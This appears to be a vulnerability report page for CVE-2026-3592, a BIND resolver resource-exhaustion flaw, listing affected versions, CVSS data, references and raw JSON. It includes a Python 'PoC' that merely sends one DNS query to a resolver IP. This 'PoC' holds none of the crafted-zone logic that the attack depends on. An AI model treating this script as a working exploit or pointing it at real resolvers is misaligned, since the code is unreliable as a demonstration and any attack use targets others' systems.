Security Vulnerability Report
CVE-2026-3592 CVSS 5.3 MEDIUM

Published: 2026-05-20 13:16:24
Last Modified: 2026-05-20 14:04:57

Description

BIND resolvers are vulnerable to an amplified resource consumption/exhaustion attack. If a victim resolver makes a query to a specially crafted zone, the resolver will consume disproportionate resources. This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

BIND 9.11.0 - 9.16.50
BIND 9.18.0 - 9.18.48
BIND 9.20.0 - 9.20.22
BIND 9.21.0 - 9.21.21
BIND 9.11.3-S1 - 9.16.50-S1
BIND 9.18.11-S1 - 9.18.48-S1
BIND 9.20.9-S1 - 9.20.22-S1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import dns.query
import dns.message

# PoC Concept for CVE-2026-3592
# This script demonstrates sending a query to a resolver that is expected to trigger the resource consumption.
# The target zone must be specifically crafted to exploit the vulnerability.

def trigger_vulnerability(target_resolver_ip, crafted_domain):
    # Create a DNS query for the crafted domain
    query = dns.message.make_query(crafted_domain, 'A')

    try:
        # Send the query to the vulnerable resolver
        response = dns.query.udp(query, target_resolver_ip, timeout=5)
        print(f"Query sent to {target_resolver_ip} for {crafted_domain}")
        print(f"Response received: {response}")
    except Exception as e:
        print(f"Error occurred: {e}")

if __name__ == "__main__":
    # Replace with the IP of the vulnerable BIND resolver
    # Replace with the domain hosted in the crafted zone
    target_ip = "192.168.1.100"
    malicious_domain = "example.vuln.zone"
    trigger_vulnerability(target_ip, malicious_domain)

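References

https://downloads.isc.org/isc/bind9/9.18.49
https://downloads.isc.org/isc/bind9/9.20.23
https://downloads.isc.org/isc/bind9/9.21.22
https://kb.isc.org/docs/cve-2026-3592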

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3592", "sourceIdentifier": "[email protected]", "published": "2026-05-20T13:16:23.790", "lastModified": "2026-05-20T14:04:57.320", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "BIND resolvers are vulnerable to an amplified resource consumption/exhaustion attack. If a victim resolver makes a query to a specially crafted zone, the resolver will consume disproportionate resources.\nThis issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-408"}]}], "references": [{"url": "https://downloads.isc.org/isc/bind9/9.18.49", "source": "[email protected]"}, {"url": "https://downloads.isc.org/isc/bind9/9.20.23", "source": "[email protected]"}, {"url": "https://downloads.isc.org/isc/bind9/9.21.22", "source": "[email protected]"}, {"url": "https://kb.isc.org/docs/cve-2026-3592", "source": "[email protected]"}]}}